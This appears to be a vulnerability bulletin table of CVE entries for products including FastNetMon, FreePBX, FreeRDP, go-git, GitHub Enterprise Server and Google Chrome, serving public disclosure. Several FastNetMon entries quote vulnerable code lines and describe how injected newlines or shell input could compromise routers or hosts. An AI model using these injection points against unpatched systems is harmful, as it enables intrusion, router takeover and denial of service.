| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 exposes a gRPC API server on port 50052 with no authentication mechanism. The server is initialized with grpc::InsecureServerCredentials() (src/fastnetmon.cpp line 477) and a source code comment explicitly acknowledges 'Listen on the given address without any authentication mechanism.' None of the RPC methods in src/api.cpp (ExecuteBan, ExecuteUnBan, GetBanlist, GetTotalTrafficCounters, etc.) perform any credential verification. The ExecuteBan and ExecuteUnBan methods trigger security-critical actions: BGP route announcements that can blackhole network traffic, and execution of external notification scripts via popen(). An attacker with local network access can ban arbitrary IP addresses (causing denial of service to legitimate traffic), unban active attacks (disabling DDoS mitigation), and trigger script execution. There is also no role-based access control separating read-only monitoring from destructive administrative operations. | 2026-05-26 | not yet calculated | CVE-2026-48692 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/api.cpp https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fastnetmon.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48692-grpc-no-auth |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 is vulnerable to a local symlink attack via predictable file paths in /tmp. The statistics file path defaults to '/tmp/fastnetmon.dat' (src/fastnetmon.cpp line 159). The print_screen_contents_into_file() function (src/fastnetmon_logic.cpp line 2186) opens this path with std::ios::trunc without checking for symlinks or using O_NOFOLLOW. Additionally, the chmod() call on line 2190 always operates on cli_stats_file_path regardless of which file_path parameter was passed (a bug that applies wrong permissions), and the umask is set to 0 during daemonization (src/fastnetmon.cpp line 1821), making all created files world-writable. A local attacker can exploit this to overwrite arbitrary files as the FastNetMon process user (typically root). | 2026-05-26 | not yet calculated | CVE-2026-48693 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fastnetmon.cpp https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fastnetmon_logic.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48693-symlink-tmp |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains a configuration injection vulnerability in the Juniper router integration plugin. In src/juniper_plugin/fastnetmon_juniper.php, the $IP_ATTACK variable (received from argv[1]) is directly interpolated into Juniper NETCONF set-configuration commands at lines 69 and 90 without any validation or sanitization. Line 69: $conn->load_set_configuration("set routing-options static route {$IP_ATTACK} community 65535:666 discard"). Line 90: $conn->load_set_configuration("delete routing-options static route {$IP_ATTACK}/32"). An attacker who can control the IP address string can inject additional Juniper CLI configuration commands by embedding newline characters followed by arbitrary set/delete commands. This could modify the router's routing table, firewall filters, user accounts, or any other configuration element accessible via NETCONF. The impact is full router compromise. | 2026-05-26 | not yet calculated | CVE-2026-48694 | https://github.com/pavel-odintsov/fastnetmon https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48694-juniper-netconf-injection |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 contains an OS command injection vulnerability in the MikroTik router integration plugin. The _log() function in src/mikrotik_plugin/fastnetmon_mikrotik.php (lines 107-108) constructs shell commands by concatenating the $msg parameter directly into exec() calls: exec("echo `date` \"- {FASTNETMON] - " . $msg . " \" >> " . $FILE_LOG_TMP). This is identical in pattern to the Juniper plugin vulnerability. The $msg variable contains unsanitized attack data from command-line arguments. An attacker who can influence argv[] values can inject arbitrary shell commands. The fix is to replace exec() with file_put_contents() or use escapeshellarg(). | 2026-05-26 | not yet calculated | CVE-2026-48695 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/mikrotik_plugin/fastnetmon_mikrotik.php https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48695-mikrotik-cmd-injection |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 has a buffer overflow, a different vulnerability than CVE-2026-48686 and CVE-2026-48689. | 2026-05-26 | not yet calculated | CVE-2026-48696 | https://github.com/pavel-odintsov/fastnetmon https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48696-exabgp-sprintf-overflow |
| FastNetMon--FastNetMon Community Edition | FastNetMon Community Edition through 1.2.9 does not verify TLS certificates on outbound HTTPS connections. The execute_web_request_secure() function in src/fast_library.cpp creates a boost::asio::ssl::context with tls_client mode and calls set_default_verify_paths() to load CA certificates, but never calls set_verify_mode(boost::asio::ssl::verify_peer). Without this call, OpenSSL performs the TLS handshake without validating the server's certificate chain, making all HTTPS connections vulnerable to man-in-the-middle attacks. This function is used for telemetry reporting to community-stats.fastnetmon.com, which sends system information including CPU model, kernel version, traffic statistics, and software configuration. An attacker can intercept and modify this data or redirect it to a malicious server. | 2026-05-26 | not yet calculated | CVE-2026-48697 | https://github.com/pavel-odintsov/fastnetmon https://github.com/pavel-odintsov/fastnetmon/blob/master/src/fast_library.cpp https://lorikeetsecurity.com/blog/fastnetmon-cve-2026-48697-missing-tls-validation |
| flowintel--flowintel | FlowIntel up to version 3.3.0 contains a server-side request forgery (SSRF) vulnerability in the external reference URL probe functionality in app/case/task.py. An attacker who can submit an external reference URL can cause the application server to issue an HTTP HEAD request to an attacker-specified destination. Due to insufficient validation of the URL scheme and resolved destination address, affected versions may allow requests to loopback, link-local, private, reserved, or other restricted network resources, potentially enabling interaction with internal services or cloud metadata endpoints from the server's network context. | 2026-05-28 | not yet calculated | CVE-2026-9813 | https://github.com/flowintel/flowintel/commit/68b523b47854c54bf36fd706c0fd5353063b5409 |
| Follet School Solutions--Destiny | Cross Site Scripting vulnerability in Follet School Solutions Destiny before v22.0.1 AU1 allows a remote attacker to run arbitrary client-side code via the showSupportExpiredMessage parameter of handleloginform.do. | 2026-05-28 | not yet calculated | CVE-2024-47096 | https://www.securin.io/zero-day/cve-2024-47096-reflected-cross-site-scripting-in-follett-school-solutions-destiny-library-manager/ |
| Follet School Solutions--Destiny | Cross Site Scripting vulnerability in Follet School Solutions Destiny before v22.0.1 AU1 allows a remote attacker to run arbitrary client-side code via the site parameter of handleloginform.do. | 2026-05-28 | not yet calculated | CVE-2024-47097 | https://www.securin.io/zero-day/cve-2024-47097-reflected-cross-site-scripting-in-follett-school-solutions-destiny-library-manager/ |
| free5gc--free5gc | free5GC is an open-source implementation of the 5G core network. Prior to 4.2.2, the free5GC UDM component fails to validate the supi path parameter in six GET handlers of the nudm-sdm (Subscriber Data Management) service. An unauthenticated attacker can inject control characters into the SUPI parameter, causing UDM to forward a malformed request to UDR and return a 500 Internal Server Error response that exposes internal infrastructure details. This vulnerability is fixed in 4.2.2. | 2026-05-27 | not yet calculated | CVE-2026-42459 | https://github.com/free5gc/free5gc/security/advisories/GHSA-585v-hcgf-jhfr |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. Prior to 17.0.8, the FreePBX api module's OAuth2 implementation does not sufficiently validate client credentials during token issuance. Knowledge of a valid client_id is required. The validateClient() method in ClientRepository.php unconditionally returns true, allowing any party with knowledge of a valid client_id to obtain OAuth2 access tokens without providing the correct client_secret. This vulnerability is fixed in 17.0.8. | 2026-05-29 | not yet calculated | CVE-2026-44237 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-vgjf-4h63-8vcc |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. Prior to 16.0.50 and 17.0.11, the CDR Reports module page allows SQL injection through the order and sort POST parameters. Authentication with a FreePBX Administration Control Panel account that has CDR section access is required. Full administrator privileges are not needed. This vulnerability is fixed in 16.0.50 and 17.0.11. | 2026-05-29 | not yet calculated | CVE-2026-44238 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-p9fq-fmpw-2h9x |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. Prior to 16.0.22 and 17.0.5, the Dashboard module's getcontent AJAX handler includes PHP files based on user-supplied input without path sanitization. The $_REQUEST['rawname'] parameter is concatenated into an include() call with a .class.php suffix, allowing path traversal via ../ sequences to include arbitrary .class.php files from the filesystem. The included file's PHP code executes before the subsequent class instantiation error occurs. This vulnerability is fixed in 16.0.22 and 17.0.5. | 2026-05-29 | not yet calculated | CVE-2026-44239 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-hw7v-v2jp-wc4v |
| FreePBX--security-reporting | FreePBX is an open source IP PBX. From 15.0.42 to before 16.0.45 and 17.0.7, unauthenticated users may be able to access the User Control Panel (UCP) using hard-coded initial template credentials if these were not immediately changed by the Administrator who enabled UCP. Authenticated access to ACP is required for the initial setup of UCP generic templates, but after that, without further steps by the admin, unauthenticated users may be able to gain access. This vulnerability is fixed in 16.0.45 and 17.0.7. | 2026-05-29 | not yet calculated | CVE-2026-46376 | https://github.com/FreePBX/security-reporting/security/advisories/GHSA-m55x-h47x-v3gx |
| FreeRDP--FreeRDP | FreeRDP is a free implementation of the Remote Desktop Protocol. Prior to 3.26.0, FreeRDP's planar bitmap decoder has an out-of-bounds heap write when decoding RLE planar data. In libfreerdp/codec/planar.c, freerdp_bitmap_decompress_planar() validates the X destination coordinate nXDst against the caller-provided destination stride (nDstStep) even when it is writing into the internal temp buffer pTempData. An attacker can bypass the check with a large nDstStep and a large nXDst, causing planar_decompress_plane_rle() to write past the end of pTempData. This vulnerability is fixed in 3.26.0. | 2026-05-29 | not yet calculated | CVE-2026-45700 | https://github.com/FreeRDP/FreeRDP/security/advisories/GHSA-mpxh-8fq3-x8mh |
| gitbutlerapp--gitbutler | GitButler is a modern Git-based version control interface for AI-powered workflows. Prior to 0.19.7, a emote code execution vulnerability exists in the Tauri-based GitButler desktop application. An attacker can inject a malicious link in a pull request body, which if clicked by the user allows for arbitrary script execution in the Tauri webview. Users that have not enabled forge integration are not at risk. This vulnerability is fixed in 0.19.7. | 2026-05-28 | not yet calculated | CVE-2026-45261 | https://github.com/gitbutlerapp/gitbutler/security/advisories/GHSA-xpmj-536r-9fc6 |
| GitHub--Enterprise Server | A Server-Side Request Forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed an attacker to cause the server to issue HTTP requests to internal services via the security advisories package lookup feature. By directing requests to an internal management service and measuring response timing, an attacker could infer the values of sensitive environment variables, including signing secrets and private keys. Exploitation required GitHub Packages to be enabled; on instances not running in private mode the vulnerability was exploitable without authentication, otherwise any authenticated user could exploit it. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.21.1 and was fixed in versions 3.20.3, 3.19.7, 3.18.10, 3.17.16, and 3.16.19. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-26 | not yet calculated | CVE-2026-8606 | https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.1 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.3 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.7 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.10 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.16 https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.19 |
| GitHub--Enterprise Server | A server-side request forgery (SSRF) vulnerability was identified in GitHub Enterprise Server that allowed an unauthenticated attacker to send crafted requests to internal services by exploiting insufficient input validation in an upload endpoint. By injecting path traversal content into request parameters, an attacker could bypass the intended request flow and redirect internal API calls, potentially accessing internal services and exposing sensitive credentials. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.22 and was fixed in versions 3.16.20, 3.17.17, 3.18.11, 3.19.8, 3.20.4, and 3.21.1. This vulnerability was reported via the GitHub Bug Bounty program. | 2026-05-27 | not yet calculated | CVE-2026-9312 | https://docs.github.com/en/enterprise-server@3.16/admin/release-notes#3.16.20 https://docs.github.com/en/enterprise-server@3.17/admin/release-notes#3.17.17 https://docs.github.com/en/enterprise-server@3.18/admin/release-notes#3.18.11 https://docs.github.com/en/enterprise-server@3.19/admin/release-notes#3.19.8 https://docs.github.com/en/enterprise-server@3.20/admin/release-notes#3.20.4 https://docs.github.com/en/enterprise-server@3.21/admin/release-notes#3.21.1 |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to 5.19.0 and 6.0.0-alpha.3, go-git may parse malformed Git objects in a way that differs from upstream Git. When commit or tag objects contain ambiguous or malformed headers, go-git's decoded representation may expose values differently from how Git itself would interpret or reject the same object. Additionally, go-git's commit signing and verification logic operates over commit data reconstructed from go-git's parsed representation rather than the original raw object bytes. As a result, go-git may sign or verify a commit payload that is not byte-for-byte equivalent to the object stored in the repository. This can cause a signature to appear valid for a commit whose displayed or effective metadata differs from the object that was intended to be signed. This vulnerability is fixed in 5.19.0 and 6.0.0-alpha.3. | 2026-05-27 | not yet calculated | CVE-2026-45022 | https://github.com/go-git/go-git/security/advisories/GHSA-389r-gv7p-r3rp |
| go-git--go-git | go-git is an extensible git implementation library written in pure Go. Prior to 5.19.1 and 6.0.0-alpha.4, go-git's SSH transport constructs the remote exec command by wrapping the repository path in single quotes without escaping single quotes embedded inside the path. A repository path containing a single quote can therefore break out of the quoted region in the exec command and be appended as additional shell tokens. This vulnerability is fixed in 5.19.1 and 6.0.0-alpha.4. | 2026-05-27 | not yet calculated | CVE-2026-45570 | https://github.com/go-git/go-git/security/advisories/GHSA-m7cr-m3pv-hgrp |
| golang.org/x/image--golang.org/x/image/bmp | Decoding a paletted BMP file with an out-of-range palette index results in a panic when accessing pixels in the invalid image. | 2026-05-29 | not yet calculated | CVE-2026-42500 | https://go.dev/issue/79576 https://groups.google.com/g/golang-announce/c/uhYX90BlBvI https://go.dev/cl/781500 https://pkg.go.dev/vuln/GO-2026-5031 |
| golang.org/x/image--golang.org/x/image/tiff | The TIFF decoder does not place a limit on the size of PackBits-compressed data. A maliciously-crafted image can exploit this to cause a small image (both in terms of pixel width/height and encoded size) to make the decoder decode large amounts of compressed data. | 2026-05-29 | not yet calculated | CVE-2026-46599 | https://go.dev/issue/79577 https://go.dev/cl/759960 https://groups.google.com/g/golang-announce/c/uhYX90BlBvI https://pkg.go.dev/vuln/GO-2026-5032 |
| Google Cloud--Apigee-X | A vulnerability in the Google Cloud Apigee SetIntegrationRequest policy allowed remote attackers to perform Server-Side Request Forgery (SSRF) and exfiltrate service account access tokens. For successful exploitation, an administrator must initially establish an insecure configuration of the API proxy. | 2026-05-26 | not yet calculated | CVE-2026-2264 | https://docs.cloud.google.com/apigee/docs/security-bulletins/security-bulletins#gcp-2026-034 |
| Google--Chrome | Use after free in Passwords in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10000 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513505608 |
| Google--Chrome | Use after free in PerformanceManager in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10001 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513505927 |
| Google--Chrome | Use after free in PDFium in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially exploit heap corruption via a crafted PDF file. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10002 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513536416 |
| Google--Chrome | Use after free in Views in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10003 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513609324 |
| Google--Chrome | Insufficient validation of untrusted input in Passwords in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to perform UI spoofing via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10004 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513730012 |
| Google--Chrome | Use after free in WebAppInstalls in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who convinced a user to engage in specific UI gestures to execute arbitrary code via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10005 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513750089 |
| Google--Chrome | Race in WebAudio in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10006 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513750691 |
| Google--Chrome | Use after free in SVG in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10007 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513754619 |
| Google--Chrome | Uninitialized Use in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10008 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513768979 |
| Google--Chrome | Integer overflow in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10009 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513973560 |
| Google--Chrome | Inappropriate implementation in Input in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to bypass site isolation via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10010 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513995565 |
| Google--Chrome | Inappropriate implementation in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to leak cross-origin data via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10011 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514017326 |
| Google--Chrome | Use after free in Skia in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10012 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514063977 |
| Google--Chrome | Use after free in WebCodecs in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10013 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514715455 |
| Google--Chrome | Use after free in WebMIDI in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10014 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514742327 |
| Google--Chrome | Integer overflow in WTF in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10015 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/514746176 |
| Google--Chrome | Use after free in DOM in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: High) | 2026-05-28 | not yet calculated | CVE-2026-10016 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/515155946 |
| Google--Chrome | Out of bounds read in Headless in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10017 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504156069 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to obtain potentially sensitive information from process memory via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10018 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/504175501 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10019 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505056913 |
| Google--Chrome | Insufficient validation of untrusted input in Skia in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10020 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496565479 |
| Google--Chrome | Insufficient validation of untrusted input in USB in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10021 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/497327715 |
| Google--Chrome | Type Confusion in V8 in Google Chrome prior to 148.0.7778.216 allowed an attacker who convinced a user to install a malicious extension to execute arbitrary code inside a sandbox via a crafted Chrome Extension. (Chromium security severity: Medium) | 2026-05-28 | not yet calculated | CVE-2026-10022 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513289241 |
| Google--Chrome | Out of bounds write in GPU in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9872 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505077859 |
| Google--Chrome | Use after free in Network in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9873 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/507365348 |
| Google--Chrome | Use after free in Dawn in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9874 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/500609038 |
| Google--Chrome | Out of bounds read in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9875 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/507508103 |
| Google--Chrome | Use after free in WebGL in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9876 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/493747593 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9877 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/496445460 |
| Google--Chrome | Use after free in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code inside a sandbox via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9878 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499054245 |
| Google--Chrome | Out of bounds write in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9879 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/499129768 |
| Google--Chrome | Insufficient validation of untrusted input in WebGL in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9880 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/503615025 |
| Google--Chrome | Use after free in Bluetooth in Google Chrome on Mac prior to 148.0.7778.216 allowed an attacker who convinced a user to install a malicious extension to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9881 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/505140741 |
| Google--Chrome | Integer overflow in ANGLE in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to leak cross-origin data via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9882 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506375217 |
| Google--Chrome | Use after free in Base in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9883 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/506477192 |
| Google--Chrome | Use after free in Browser in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9884 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508289938 |
| Google--Chrome | Insufficient validation of untrusted input in UI in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9885 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508452241 |
| Google--Chrome | Use after free in Base in Google Chrome on Mac prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9886 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/508456788 |
| Google--Chrome | Use after free in Proxy in Google Chrome prior to 148.0.7778.216 allowed a remote attacker to execute arbitrary code via a crafted PAC script. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9887 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511249104 |
| Google--Chrome | Use after free in WebView in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9888 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511715166 |
| Google--Chrome | Out of bounds read and write in Dawn in Google Chrome on Android prior to 148.0.7778.216 allowed a remote attacker to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9889 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/511727159 |
| Google--Chrome | Use after free in XR in Google Chrome on Windows prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted HTML page. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9890 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513135985 |
| Google--Chrome | Use after free in Extensions in Google Chrome prior to 148.0.7778.216 allowed a remote attacker who had compromised the renderer process to potentially perform a sandbox escape via a crafted Chrome Extension. (Chromium security severity: Critical) | 2026-05-28 | not yet calculated | CVE-2026-9891 | https://chromereleases.googleblog.com/2026/05/stable-channel-update-for-desktop_0877304591.html https://issues.chromium.org/issues/513508128 |
